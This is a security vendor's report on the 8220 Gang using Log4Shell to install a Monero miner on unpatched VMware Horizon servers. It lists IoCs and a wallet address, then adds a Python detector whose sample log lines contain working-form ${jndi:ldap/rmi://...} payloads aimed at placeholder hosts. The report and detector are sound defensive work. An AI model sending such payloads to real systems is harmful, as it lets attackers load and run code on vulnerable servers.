8220 Gang Uses Log4Shell Vulnerability to Install CoinMiner
Posted By Sanseo, Ap

AhnLab Security Emergency response Center (ASEC) has recently confirmed that the 8220 Gang attack group is using the Log4Shell vulnerability to install CoinMiner on VMware Horizon servers. Among the targeted systems were Korean energy-related companies running unpatched, vulnerable servers, which had accordingly been preyed upon by multiple attackers.

Log4Shell (CVE-2021-44228) is a remote code execution vulnerability in Log4j, the Java-based logging library. When an attacker-controlled string containing a JNDI lookup (a ${jndi:ldap://<attacker host>/...} lookup, for example) is written to a log, a vulnerable Log4j version resolves the lookup, connects to the remote address it names, and can load and execute the attacker's Java object on the server. Any server that logs unsanitized input through vulnerable Log4j can therefore be compromised simply by sending it such a string.

8220 Gang is an attack group that targets vulnerable Windows and Linux systems. Its activity has been observed since 2017. The group tends to install CoinMiner on whatever vulnerable systems it finds, and it targets not only global systems but also Korean ones. ASEC has previously introduced a case in which the group abused the Atlassian Confluence server vulnerability CVE-2022-26134 to attack Korean systems and install CoinMiner.

Figure 14. Wallet address
Wallet Address: "46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ"

The attacker's Monero wallet address is identical to the address seen in the previously revealed Atlassian Confluence server vulnerability attack. It is also identical to the address in the recent Oracle WebLogic server vulnerability attack case posted by Fortinet. The 8220 Gang attack group has consistently been using the same wallet address.

The attack group known as 8220 Gang installs XMRig CoinMiner to mine Monero on vulnerable systems that have not been patched. There have been cases where the group targeted vulnerable Atlassian Confluence servers, and recently it has been using the Log4Shell vulnerability against VMware Horizon servers. Administrators must check whether their VMware Horizon servers are susceptible and apply the latest patches to prevent vulnerability attacks. Servers accessible from outside should also be protected with security products such as firewalls to restrict access by attackers. Finally, AhnLab V3 should be updated to the latest version to block malware infections in advance.

IoCs
– hxxp:///deliver1.exe : ScrubCrypt for CoinMiner
– hxxp:///bypass.ps1 : Log4Shell PowerShell downloader
– hxxp://163.123.142.210/bypass.ps1 : Oracle WebLogic exploit PowerShell downloader
– d63be89106d40f7b22e5c66de6ea5d65 : Oracle WebLogic exploit PowerShell downloader (bypass.ps1)
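The lookup resolution described above, where Log4j evaluates ${...} expressions inside a logged string, is also what a detection has to key on. The following is an added example, not code from the ASEC post or from AhnLab: it scans web server log lines for JNDI lookups, undoing URL encoding and the nested-lookup obfuscations attackers use to hide the literal string "jndi" (${lower:j}, ${::-j}, double encoding), which goes beyond the plain form the post mentions. Every log line, address and host in it is a constructed sample.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookups in web server log lines.

Added example, not code from the ASEC post. Log4j resolves ${...} lookups in
logged strings; a ${jndi:<scheme>://<host>/...} lookup makes the server fetch
and load an attacker-supplied Java object. Attackers hide the literal "jndi"
behind URL encoding and nested lookups, so the scanner undoes both before
matching. All log lines and hosts below are constructed samples.
"""
import re
import urllib.parse

# Innermost ${...} with no further nesting inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The lookup that actually triggers the outbound JNDI request.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/}\s]+)", re.I)


def _resolve(body):
    """Evaluate one un-nested lookup body for the tricks used in obfuscated
    payloads: ${x:-y} falls back to y when lookup x is unknown or empty, and
    ${lower:X}/${upper:x} change case. Other lookups (env, sys, date, ...)
    depend on the victim's environment, so they are treated as empty, which
    is the conservative choice for detection. None means "leave as is"."""
    if body.lower().startswith("jndi:"):
        return None                      # keep: this is what we want to detect
    if ":-" in body:
        return body.split(":-", 1)[1]    # default-value trick, e.g. ${::-j} -> j
    if ":" in body:
        name, arg = body.split(":", 1)
        if name.lower() == "lower":
            return arg.lower()
        if name.lower() == "upper":
            return arg.upper()
        return ""                        # env/sys/date/...: unknown at scan time
    return None                          # not a lookup form we evaluate


def deobfuscate(text, max_rounds=32):
    """Collapse nested lookups from the inside out until nothing changes."""
    def repl(m):
        r = _resolve(m.group(1))
        return m.group(0) if r is None else r

    for _ in range(max_rounds):
        new = _INNER.sub(repl, text)
        if new == text:
            break
        text = new
    return text


def url_decode(text, max_layers=3):
    """Undo up to max_layers of percent-encoding (payloads are often double-encoded)."""
    for _ in range(max_layers):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_line(line):
    """Return (scheme, host) of the JNDI target if the line carries a lookup, else None."""
    text = deobfuscate(url_decode(line))
    m = _JNDI.search(text)
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines):
    """Return [(line_index, scheme, host), ...] for every matching line."""
    hits = []
    for i, line in enumerate(lines):
        hit = scan_line(line)
        if hit:
            hits.append((i, hit[0], hit[1]))
    return hits


# Constructed sample access log: one benign request, then a plain payload in
# the User-Agent, a URL-encoded nested-lookup payload in a query parameter,
# and a default-value-trick payload pointing at an RMI listener.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:12:33 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:13:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:10:13:05 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3A'
    'ldap%3A%2F%2F198.51.100.8%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Dec/2021:10:13:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://198.51.100.9:1099/x}"',
]

if __name__ == "__main__":
    for i, scheme, host in scan(SAMPLE_LOG):
        print(f"line {i}: JNDI lookup via {scheme} to {host}")
```

The scanner flags the resolved lookup rather than the raw string, so the same rule catches the plain, percent-encoded and nested variants; the host it extracts is the address the vulnerable server would have connected to, which is the first thing to block and to search for in outbound connection logs.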